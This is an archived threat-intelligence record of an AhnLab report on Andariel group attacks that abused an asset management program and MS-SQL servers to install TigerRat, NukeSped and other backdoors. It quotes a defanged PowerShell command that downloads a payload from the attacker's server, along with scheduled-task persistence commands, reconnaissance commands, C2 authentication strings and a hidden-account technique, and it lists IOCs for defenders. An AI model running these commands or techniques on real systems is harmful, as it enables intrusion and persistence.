{ "id": "3e086bb2-bb91-45bb-8196-7196a2bbd5c4", "created_at": "2026-04-06T00:13:32.590106Z", "updated_at": "2026-04-10T13:12:33.768139Z", "deleted_at": null, "sha1_hash": "4a7154b6411b812d13450055fdde2c6cef1b80ab", "title": "Circumstances of an Attack Exploiting an Asset Management Program (Andariel Group)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 803878, "plain_text": "Circumstances of an Attack Exploiting an Asset Management\r\nProgram (Andariel Group)\r\nBy ATCP\r\nPublished: 2023-11-09 · Archived: 2026-04-05 21:09:20 UTC\r\nThe ASEC analysis team identified the circumstances of the Andariel group distributing malware via an attack\r\nusing a certain asset management program. The Andariel group is known to be in a cooperative relationship with\r\nor a subsidiary organization of the Lazarus group.\r\nThe Andariel group usually launches spear phishing, watering hole, or supply chain attacks for initial penetration.\r\nThere is also a case where the group exploited a central management solution during the malware installation\r\nprocess. Recently, the Andariel group has been exploiting vulnerabilities in many programs such as Log4Shell and\r\nInnorix Agent to attack targets in various corporate sectors in South Korea. [1]\r\nAnother asset management program was used in the recently identified attack. Additionally, an attack targeting\r\nMS-SQL Server was also identified at the same time. Malware strains installed through these attacks include not\r\nonly TigerRat, but also various other types such as NukeSped variants, Black RAT, and Lilith RAT, an open-source malware strain. The attack targets were found to be South Korean communications companies and\r\nsemiconductor manufacturers, similar to those in previous cases of attacks.\r\n1. Initial Penetration\r\nAhnLab Smart Defense (ASD) recently detected logs of a certain South Korean asset management program\r\nhaving installed the Andariel group’s malware. But of course, it cannot be determined from these logs alone\r\nwhether these signify an attack that takes advantage of a vulnerability or a simple exploit. The asset management\r\nprogram running in the target system ultimately used the following PowerShell command to download the\r\nmalware.\r\nFigure 1. Malware downloaded using an asset management program\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 1 of 13\n\nPowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\\Users\\public\\credis.exe\r\nBesides PowerShell, the Andariel group also used the mshta.exe process to download malware. The following is\r\nHTML malware uploaded to the C\u0026C URL, and this malware is responsible for downloading other malware\r\nstrains from the Andariel group such as TigerRat.\r\nFigure 2. Downloader script\r\nIn previous attack cases, the Andariel group used Innorix Agent and spear phishing attacks together. A notable fact\r\nabout the recent attacks is that there are cases where malware was installed using MS-SQL Server. It is presumed\r\nthat the threat actor attacked poorly managed MS-SQL servers and installed NukeSped. The presumption is based\r\non the fact that malware strains such as Remcos RAT and Mallox ransomware are also usually installed through\r\nattacks against MS-SQL servers which have account credentials that are vulnerable against brute force or\r\ndictionary attacks, and also on the fact that there are logs of other threat actors’ attempts to install such malware\r\nstrains in the system in the past. Thus, it seems that the Andariel group has also been using poorly managed MS-SQL servers as attack vectors in recent days.\r\nFigure 3. NukeSped being installed through MS-SQL Server\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 2 of 13\n\nSimilar to other attacks that target MS-SQL Server, PrintSpoofer was used for privilege escalation during the\r\nattack process.\r\nFigure 4. PrintSpoofer privilege escalation malware also used in the attack against MS-SQL Server\r\n2. Malware Used in Attacks\r\nBackdoors installed through the attacks above include TigerRat, a major malware strain used by the Andariel\r\ngroup, as well as Black RAT and variants of NukeSped. These malware strains are almost identical to those of\r\nprevious attacks, but open-source malware Lilith RAT was used in the recent attacks. Additionally, in line with the\r\nAndariel group’s recent tendency that uses malware developed in the Go language, a downloader malware\r\ndeveloped in Go was also discovered.\r\n2.1. TigerRat\r\nThe malware installed through the South Korean asset management program was TigerRat. The Andariel group\r\nhas been using TigerRat in most attacks against South Korean targets; the attacks include watering hole,\r\nLog4Shell vulnerability, and more. [2] TigerRat is a backdoor that supports various features such as uploading and\r\ndownloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port\r\nforwarding.\r\nA difference between this and other ordinary backdoors is that there is an authentication process during initial\r\ncommunications with the C\u0026C server where a certain string must be sent and received. Like the types identified in\r\n2023, random strings with sizes of 0x20 were used in the authentication for TigerRat in the recent attacks. These\r\nstrings are deemed to be the MD5 hash for “fool”(dd7b696b96434d2bf07b34f9c125d51d) and\r\n“iwan”(01ccce480c60fcdb67b54f4509ffdb56).\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 3 of 13\n\nFigaure 5. Strings used in authentication with the C\u0026C server\r\nC\u0026C request string: dd7b696b96434d2bf07b34f9c125d51d\r\nC\u0026C response string: 01ccce480c60fcdb67b54f4509ffdb56\r\n2.2. Golang Downloader\r\nThe Andariel group has been creating and using various backdoors in the Go language since around 2023. Black\r\nRAT, Goat RAT, and DurianBeacon were used in previous cases, and a downloader developed in Go was used in\r\nthe recent attacks. This malware has a simple structure that connects to the C\u0026C server and installs an additional\r\npayload. A notable characteristic is that it uses Base64 encryption during communications with the C\u0026C server.\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 4 of 13\n\nFigure 6. The downloader malware’s Base64 decryption routine\r\nNot only did the threat actor exploit the South Korean asset management program to install TigerRat directly, but\r\nthey also employed the method of installing the Golang downloader which in turn installed an additional payload.\r\nMalware installed through the Golang downloader include TigerRat and variants of NukeSped.\r\n2.3. NukeSped Variants\r\nNukeSped is a backdoor that can receive commands from the C\u0026C server and control the infected system. Among\r\nthe NukeSped variants used in the attacks, Type 1 sends a packet using the POST method during initial\r\ncommunications with the C\u0026C server and then sends the results of the executed commands transmitted from the\r\nC\u0026C server through the GET method disguised as the behavior of visiting Google.\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 5 of 13\n\nFigure 7. C\u0026C communications packet\r\nAnother NukeSped variant was identified in the attack process. While it has a small size of 23 KB, the string used\r\nfor auto-deletion is similar to that of the past NukeSped variants.\r\nFigure 8. NukeSped’s string\r\n2.4. Black RAT\r\nBlack RAT is a backdoor developed in the Go language and was first identified in an attack by the Andariel group\r\nin 2023. While no source code information is included in the Black RAT used in the recent attacks, it could be\r\ndistinguished through the fact that the function names were almost identical to the Black RAT in the past.\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 6 of 13\n\nFigure 9. List of Black RAT’s functjions\r\n2.5. Lilith RAT\r\nLilith RAT is an open-source RAT malware published on GitHub. It was developed in C++ and provides various\r\nfeatures for controlling the infected system such as remote code execution, maintaining persistence, and auto-delete.\r\nFigure 10. Lilith RAT’s GitHub page\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 7 of 13\n\nLilith RAT, used by the Andariel group for their attacks, has a significant portion of the strings in its binary\r\nencrypted. This is deemed to be for the purpose of evading file detection. However, not all strings are encrypted,\r\nand some strings are the same as those in Lilith RAT’s source code.\r\nFigure 11. Strings in Lilith RAT\r\n2.6. Adding User Account\r\nAside from controlling the infected system using backdoors, the threat actor also added a user account in the\r\nsystem and concealed it. This task was performed using a malware strain the threat actor developed. Because this\r\nmalware runs properly only when a certain user account exists in the infected system, the addition of a user\r\naccount signifies that the threat actor has already gained control over the system.\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 8 of 13\n\nFigure 12. The routine that diverges depending on the existence of a certain user\r\nOrdinarily, the reasons why the threat actor adds a user account even when they can control the infected system\r\nusing a backdoor are to use Remote Desktop to control the target in a GUI environment and maintain persistence\r\nafterward. However, if an account is added without any other steps, a system user can recognize a newly created\r\nuser account upon login.\r\nFor this reason, the malware goes through the following process to prevent the user from noticing. First, the\r\naccount is created with the sign “$” added to the name. Then, a part of the SAM data of an existing user is copied\r\nand overwritten onto the created “black$” account. If the existing user is an admin account and permitted to use\r\nRemote Desktop, the “black$” account also obtains the same properties.\r\nFor reference, malware strains used by the Kimsuky group added the newly created user account to the admin\r\ngroup and also to SpecialAccounts, enabling the account in firewalls. [3] This process can easily be detected by\r\nsecurity products, but the Andariel group characteristically used the aforementioned malware to add a concealed\r\naccount without the additional step.\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 9 of 13\n\nFigure 13. Kimsuky group’s malware that adds and conceals a user account\r\n3. Post Infection\r\nAfter installing the backdoor, the threat actor ran the following commands and registered them to the task\r\nscheduler to maintain persistence.\r\nFigure 14. Commands executed by the threat actor\r\n\u003e schtasks /delete /tn “microsoft\\******” /f\r\n\u003e schtasks /create /tn “microsoft\\******” /tr “c:\\users\\%ASD%\\credis.exe” /sc onlogon /ru system\r\n\u003e schtasks /run /tn “microsoft\\windows\\mui\\route”\r\nAfterward, the following commands were used to look up information on the infected system.\r\n\u003e cmd.exe /c “query user”\r\n\u003e cmd.exe /c “ipconfig”\r\n\u003e cmd.exe /c “whoami”\r\n\u003e cmd.exe /c “cmdkey /list”\r\n\u003e cmd.exe /c “netsat -nao | findstr 445”\r\nBesides the commands above, there were other commands that removed the downloader malware or terminated\r\nother processes.\r\n\u003e cmd.exe /c “del /f c:\\users\\%ASD%\\perf.exe”\r\n\u003e taskkill /f /pid 15036\r\nIn addition to using the backdoor to collect information, the threat actor also downloaded and used hacking tools\r\nsuch as NirSoft’s CredentialsFileVIew and Network Password Recovery. These tools show account credentials\r\nsaved in the infected system as well as account credentials on shared folders. These can be used in the future for\r\nlateral movement within the organization’s network that the affected system belongs to.\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 10 of 13\n\nFigure 15. Netpass downloaded and executed after malware infection\r\n4. 결론\r\nThe Andariel group is one of the threat groups that are highly active in South Korea, alongside the Kimsuky and\r\nLazarus groups. The group initially launched attacks to acquire information related to national security, but now\r\nthey are also attacking for financial gain. [4] They are known to use spear phishing or watering hole attacks, and\r\nthey also exploit vulnerabilities in software during the initial penetration. There have also been circumstances of\r\nthe Andariel group having exploited other vulnerabilities in the attack process to distribute malware.\r\nIn recently discovered attack cases, the group seems to be using various programs such as asset management\r\nsoftware within companies for supply chain attacks in addition to launching attacks against vulnerable MY-SQL\r\nservers. Users must be particularly cautious against attachments in emails from unknown sources and executable\r\nfiles downloaded from web pages. Security administrators in companies must enhance monitoring of asset\r\nmanagement programs and apply patches for any security vulnerabilities in the programs. The latest patch for OS\r\nand programs such as Internet browsers must be applied, and V3 must be updated to the latest version to prevent\r\nmalware infection in advance.\r\nAhnLab’s anti-malware product V3 detects and blocks malware using the detection names below. The IOC is as\r\nfollows.\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 11 of 13\n\nFile Detection\r\n– Malware/Win.Generic.C5528992 (2023.10.25.00)\r\n– Malware/Win.Generic.C5528516 (2023.10.26.00)\r\n– Backdoor/Win.TigerRAT.C5517634 (2023.10.19.03)\r\n– Backdoor/Win.Agent.C5518308 (2023.10.20.00)\r\n– Downloader/HTML.Agent.SC193459 (2023.10.19.03)\r\n– Downloader/HTML.Agent.SC193403 (2023.10.18.01)\r\n– Backdoor/Win.TigerRAT.C5513095 (2023.10.17.03)\r\n– Unwanted/Win.HackTool.C5175443 (2022.06.20.02)\r\n– HackTool/Win.CredentialsFileView (2022.04.20.00)\r\n– Backdoor/Win.Agent.R619279 (2023.11.01.01)\r\n– Backdoor/Win.Agent.C5534745 (2023.11.01.01)\r\n– Backdoor/Win.NukeSped.C5535346 (2023.11.01.03)\r\n– Backdoor/Win.BlackRAT.C5535345 (2023.11.01.03)\r\n– Exploit/Win.PrintSpoofer.C5535350 (2023.11.02.00)\r\nBehavior Detection\r\n– Malware/MDP.Download.M1197\r\nMD5\r\n0414a2ab718d44bf6f7103cff287b312\r\n13b4ce1fc26d400d34ede460a8530d93\r\n232586f8cfe82b80fd0dfa6ed8795c56\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 12 of 13\n\n33a3da2de78418b89a603e28a1e8852c\r\n3a0c8ae783116c1840740417c4fbe678\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//109[.]248[.]150[.]147[:]8080/\r\nhttp[:]//109[.]248[.]150[.]147[:]8443/\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/load[.]html\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/load[.]png\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/view[.]php\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/59073/\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://asec.ahnlab.com/en/59073/" ], "report_names": [ "59073" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434412, "ts_updated_at": 1775826753, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4a7154b6411b812d13450055fdde2c6cef1b80ab.pdf", "text": "https://archive.orkl.eu/4a7154b6411b812d13450055fdde2c6cef1b80ab.txt", "img": "https://archive.orkl.eu/4a7154b6411b812d13450055fdde2c6cef1b80ab.jpg" } }